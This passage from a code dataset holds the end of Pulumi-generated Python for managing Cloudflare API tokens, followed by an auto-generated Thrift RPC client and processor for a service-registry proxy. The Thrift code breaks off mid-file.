ins=["192.0.2.1/32"],
not_ins=["198.51.100.1/32"],
),
))
```
### Account permissions
```python
import pulumi
import pulumi_cloudflare as cloudflare
all = cloudflare.get_api_token_permission_groups()
# Token allowed to read audit logs from all accounts.
logs_account_all = cloudflare.ApiToken("logsAccountAll",
name="logs_account_all",
policies=[cloudflare.ApiTokenPolicyArgs(
permission_groups=[all.permissions["Access: Audit Logs Read"]],
resources={
"com.cloudflare.api.account.*": "*",
},
)])
# Token allowed to read audit logs from specific account.
logs_account = cloudflare.ApiToken("logsAccount",
name="logs_account",
policies=[cloudflare.ApiTokenPolicyArgs(
permission_groups=[all.permissions["Access: Audit Logs Read"]],
resources={
f"com.cloudflare.api.account.{var['account_id']}": "*",
},
)])
```
### Zone Permissions
```python
import pulumi
import json
import pulumi_cloudflare as cloudflare
all = cloudflare.get_api_token_permission_groups()
# Token allowed to edit DNS entries and TLS certs for specific zone.
dns_tls_edit = cloudflare.ApiToken("dnsTlsEdit",
name="dns_tls_edit",
policies=[cloudflare.ApiTokenPolicyArgs(
permission_groups=[
all.permissions["DNS Write"],
all.permissions["SSL and Certificates Write"],
],
resources={
f"com.cloudflare.api.account.zone.{var['zone_id']}": "*",
},
)])
# Token allowed to edit DNS entries for all zones except one.
dns_tls_edit_all_except_one = cloudflare.ApiToken("dnsTlsEditAllExceptOne",
name="dns_tls_edit_all_except_one",
policies=[
cloudflare.ApiTokenPolicyArgs(
permission_groups=[all.permissions["DNS Write"]],
resources={
"com.cloudflare.api.account.zone.*": "*",
},
),
cloudflare.ApiTokenPolicyArgs(
permission_groups=[all.permissions["DNS Write"]],
resources={
f"com.cloudflare.api.account.zone.{var['zone_id']}": "*",
},
effect="deny",
),
])
# Token allowed to edit DNS entries for all zones from specific account.
dns_edit_all_account = cloudflare.ApiToken("dnsEditAllAccount",
name="dns_edit_all_account",
policies=[cloudflare.ApiTokenPolicyArgs(
permission_groups=[all.permissions["DNS Write"]],
resources={
f"com.cloudflare.api.account.{var['account_id']}": json.dumps({
"com.cloudflare.api.account.zone.*": "*",
}),
},
)])
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ApiTokenConditionArgs']] condition: Condition block. See the definition below.
:param pulumi.Input[str] name: Name of the APIToken.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApiTokenPolicyArgs']]]] policies: Permissions policy. Multiple policy blocks can be defined.
See the definition below.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApiTokenArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a resource which manages Cloudflare API tokens.
Read more about permission groups and their applicable scopes in
[the official documentation](https://developers.cloudflare.com/api/tokens/create/permissions).
## Example Usage
### User Permissions
```python
import pulumi
import pulumi_cloudflare as cloudflare
all = cloudflare.get_api_token_permission_groups()
# Token allowed to create new tokens.
# Can only be used from specific ip range.
api_token_create = cloudflare.ApiToken("apiTokenCreate",
name="api_token_create",
policies=[cloudflare.ApiTokenPolicyArgs(
permission_groups=[all.permissions["API Tokens Write"]],
resources={
f"com.cloudflare.api.user.{var['user_id']}": "*",
},
)],
condition=cloudflare.ApiTokenConditionArgs(
request_ip=cloudflare.ApiTokenConditionRequestIpArgs(
ins=["192.0.2.1/32"],
not_ins=["198.51.100.1/32"],
),
))
```
### Account permissions
```python
import pulumi
import pulumi_cloudflare as cloudflare
all = cloudflare.get_api_token_permission_groups()
# Token allowed to read audit logs from all accounts.
logs_account_all = cloudflare.ApiToken("logsAccountAll",
name="logs_account_all",
policies=[cloudflare.ApiTokenPolicyArgs(
permission_groups=[all.permissions["Access: Audit Logs Read"]],
resources={
"com.cloudflare.api.account.*": "*",
},
)])
# Token allowed to read audit logs from specific account.
logs_account = cloudflare.ApiToken("logsAccount",
name="logs_account",
policies=[cloudflare.ApiTokenPolicyArgs(
permission_groups=[all.permissions["Access: Audit Logs Read"]],
resources={
f"com.cloudflare.api.account.{var['account_id']}": "*",
},
)])
```
### Zone Permissions
```python
import pulumi
import json
import pulumi_cloudflare as cloudflare
all = cloudflare.get_api_token_permission_groups()
# Token allowed to edit DNS entries and TLS certs for specific zone.
dns_tls_edit = cloudflare.ApiToken("dnsTlsEdit",
name="dns_tls_edit",
policies=[cloudflare.ApiTokenPolicyArgs(
permission_groups=[
all.permissions["DNS Write"],
all.permissions["SSL and Certificates Write"],
],
resources={
f"com.cloudflare.api.account.zone.{var['zone_id']}": "*",
},
)])
# Token allowed to edit DNS entries for all zones except one.
dns_tls_edit_all_except_one = cloudflare.ApiToken("dnsTlsEditAllExceptOne",
name="dns_tls_edit_all_except_one",
policies=[
cloudflare.ApiTokenPolicyArgs(
permission_groups=[all.permissions["DNS Write"]],
resources={
"com.cloudflare.api.account.zone.*": "*",
},
),
cloudflare.ApiTokenPolicyArgs(
permission_groups=[all.permissions["DNS Write"]],
resources={
f"com.cloudflare.api.account.zone.{var['zone_id']}": "*",
},
effect="deny",
),
])
# Token allowed to edit DNS entries for all zones from specific account.
dns_edit_all_account = cloudflare.ApiToken("dnsEditAllAccount",
name="dns_edit_all_account",
policies=[cloudflare.ApiTokenPolicyArgs(
permission_groups=[all.permissions["DNS Write"]],
resources={
f"com.cloudflare.api.account.{var['account_id']}": json.dumps({
"com.cloudflare.api.account.zone.*": "*",
}),
},
)])
```
:param str resource_name: The name of the resource.
:param ApiTokenArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApiTokenArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['ApiTokenConditionArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApiTokenPolicyArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApiTokenArgs.__new__(ApiTokenArgs)
__props__.__dict__["condition"] = condition
if name is None and not opts.urn:
raise TypeError("Missing required property 'name'")
__props__.__dict__["name"] = name
if policies is None and not opts.urn:
raise TypeError("Missing required property 'policies'")
__props__.__dict__["policies"] = policies
__props__.__dict__["issued_on"] = None
__props__.__dict__["modified_on"] = None
__props__.__dict__["status"] = None
__props__.__dict__["value"] = None
super(ApiToken, __self__).__init__(
'cloudflare:index/apiToken:ApiToken',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['ApiTokenConditionArgs']]] = None,
issued_on: Optional[pulumi.Input[str]] = None,
modified_on: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApiTokenPolicyArgs']]]]] = None,
status: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None) -> 'ApiToken':
"""
Get an existing ApiToken resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ApiTokenConditionArgs']] condition: Condition block. See the definition below.
:param pulumi.Input[str] issued_on: The RFC3339 timestamp of when the API Token was issued.
:param pulumi.Input[str] modified_on: The RFC3339 timestamp of when the API Token was last modified.
:param pulumi.Input[str] name: Name of the APIToken.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApiTokenPolicyArgs']]]] policies: Permissions policy. Multiple policy blocks can be defined.
See the definition below.
:param pulumi.Input[str] value: The value of the API Token.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ApiTokenState.__new__(_ApiTokenState)
__props__.__dict__["condition"] = condition
__props__.__dict__["issued_on"] = issued_on
__props__.__dict__["modified_on"] = modified_on
__props__.__dict__["name"] = name
__props__.__dict__["policies"] = policies
__props__.__dict__["status"] = status
__props__.__dict__["value"] = value
return ApiToken(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def condition(self) -> pulumi.Output[Optional['outputs.ApiTokenCondition']]:
"""
Condition block. See the definition below.
"""
return pulumi.get(self, "condition")
@property
@pulumi.getter(name="issuedOn")
def issued_on(self) -> pulumi.Output[str]:
"""
The RFC3339 timestamp of when the API Token was issued.
"""
return pulumi.get(self, "issued_on")
@property
@pulumi.getter(name="modifiedOn")
def modified_on(self) -> pulumi.Output[str]:
"""
The RFC3339 timestamp of when the API Token was last modified.
"""
return pulumi.get(self, "modified_on")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the APIToken.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def policies(self) -> pulumi.Output[Sequence['outputs.ApiTokenPolicy']]:
"""
Permissions policy. Multiple policy blocks can be defined.
See the definition below.
"""
return pulumi.get(self, "policies")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
return pulumi.get(self, "status")
@property
@pulumi.getter
def value(self) -> pulumi.Output[str]:
"""
The value of the API Token.
"""
return pulumi.get(self, "value")
| 40.164021 | 160 | 0.597111 | 2,313 | 22,773 | 5.684393 | 0.095115 | 0.065257 | 0.039398 | 0.036812 | 0.844615 | 0.818375 | 0.774186 | 0.75502 | 0.751141 | 0.730758 | 0 | 0.004428 | 0.295921 | 22,773 | 566 | 161 | 40.234982 | 0.815579 | 0.465332 | 0 | 0.532407 | 1 | 0 | 0.110841 | 0.027306 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157407 | false | 0.00463 | 0.032407 | 0.009259 | 0.287037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cf1f933260aee23afb965ee12c968f2f3d79551e | 25,131 | py | Python | py/RegistryProxy.py | cychenyin/sfproxy | cef45c507143f4031efbc900852441473cf4985f | [
"Apache-2.0"
] | null | null | null | py/RegistryProxy.py | cychenyin/sfproxy | cef45c507143f4031efbc900852441473cf4985f | [
"Apache-2.0"
] | null | null | null | py/RegistryProxy.py | cychenyin/sfproxy | cef45c507143f4031efbc900852441473cf4985f | [
"Apache-2.0"
] | null | null | null | #
# Autogenerated by Thrift
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
from thrift.Thrift import *
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def get(self, serviceName):
"""
Parameters:
- serviceName
"""
pass
def remove(self, serviceName, host, port):
"""
Parameters:
- serviceName
- host
- port
"""
pass
def dump(self, ):
pass
def reset(self, ):
pass
def status(self, ):
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot != None:
self._oprot = oprot
self._seqid = 0
def get(self, serviceName):
"""
Parameters:
- serviceName
"""
self.send_get(serviceName)
return self.recv_get()
def send_get(self, serviceName):
self._oprot.writeMessageBegin('get', TMessageType.CALL, self._seqid)
args = get_args()
args.serviceName = serviceName
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "get failed: unknown result");
def remove(self, serviceName, host, port):
"""
Parameters:
- serviceName
- host
- port
"""
self.send_remove(serviceName, host, port)
return self.recv_remove()
def send_remove(self, serviceName, host, port):
self._oprot.writeMessageBegin('remove', TMessageType.CALL, self._seqid)
args = remove_args()
args.serviceName = serviceName
args.host = host
args.port = port
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_remove(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = remove_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "remove failed: unknown result");
def dump(self, ):
self.send_dump()
return self.recv_dump()
def send_dump(self, ):
self._oprot.writeMessageBegin('dump', TMessageType.CALL, self._seqid)
args = dump_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_dump(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = dump_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "dump failed: unknown result");
def reset(self, ):
self.send_reset()
return self.recv_reset()
def send_reset(self, ):
self._oprot.writeMessageBegin('reset', TMessageType.CALL, self._seqid)
args = reset_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_reset(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = reset_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "reset failed: unknown result");
def status(self, ):
self.send_status()
return self.recv_status()
def send_status(self, ):
self._oprot.writeMessageBegin('status', TMessageType.CALL, self._seqid)
args = status_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_status(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = status_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "status failed: unknown result");
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["get"] = Processor.process_get
self._processMap["remove"] = Processor.process_remove
self._processMap["dump"] = Processor.process_dump
self._processMap["reset"] = Processor.process_reset
self._processMap["status"] = Processor.process_status
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_get(self, seqid, iprot, oprot):
args = get_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_result()
result.success = self._handler.get(args.serviceName)
oprot.writeMessageBegin("get", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_remove(self, seqid, iprot, oprot):
args = remove_args()
args.read(iprot)
iprot.readMessageEnd()
result = remove_result()
result.success = self._handler.remove(args.serviceName, args.host, args.port)
oprot.writeMessageBegin("remove", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_dump(self, seqid, iprot, oprot):
args = dump_args()
args.read(iprot)
iprot.readMessageEnd()
result = dump_result()
result.success = self._handler.dump()
oprot.writeMessageBegin("dump", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_reset(self, seqid, iprot, oprot):
args = reset_args()
args.read(iprot)
iprot.readMessageEnd()
result = reset_result()
result.success = self._handler.reset()
oprot.writeMessageBegin("reset", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_status(self, seqid, iprot, oprot):
args = status_args()
args.read(iprot)
iprot.readMessageEnd()
result = status_result()
result.success = self._handler.status()
oprot.writeMessageBegin("status", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class get_args:
"""
Attributes:
- serviceName
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'serviceName', None, None, ), # 1
)
def __init__(self, serviceName=None,):
self.serviceName = serviceName
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.serviceName = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_args')
if self.serviceName != None:
oprot.writeFieldBegin('serviceName', TType.STRING, 1)
oprot.writeString(self.serviceName)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.serviceName is None:
raise TProtocol.TProtocolException(message='Required field serviceName is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class remove_args:
"""
Attributes:
- serviceName
- host
- port
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'serviceName', None, None, ), # 1
(2, TType.STRING, 'host', None, None, ), # 2
(3, TType.I32, 'port', None, None, ), # 3
)
def __init__(self, serviceName=None, host=None, port=None,):
self.serviceName = serviceName
self.host = host
self.port = port
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.serviceName = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.host = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.port = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('remove_args')
if self.serviceName != None:
oprot.writeFieldBegin('serviceName', TType.STRING, 1)
oprot.writeString(self.serviceName)
oprot.writeFieldEnd()
if self.host != None:
oprot.writeFieldBegin('host', TType.STRING, 2)
oprot.writeString(self.host)
oprot.writeFieldEnd()
if self.port != None:
oprot.writeFieldBegin('port', TType.I32, 3)
oprot.writeI32(self.port)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.serviceName is None:
raise TProtocol.TProtocolException(message='Required field serviceName is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class remove_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('remove_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class dump_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('dump_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class dump_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('dump_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class reset_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('reset_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class reset_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('reset_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class status_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('status_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class status_result:
"""
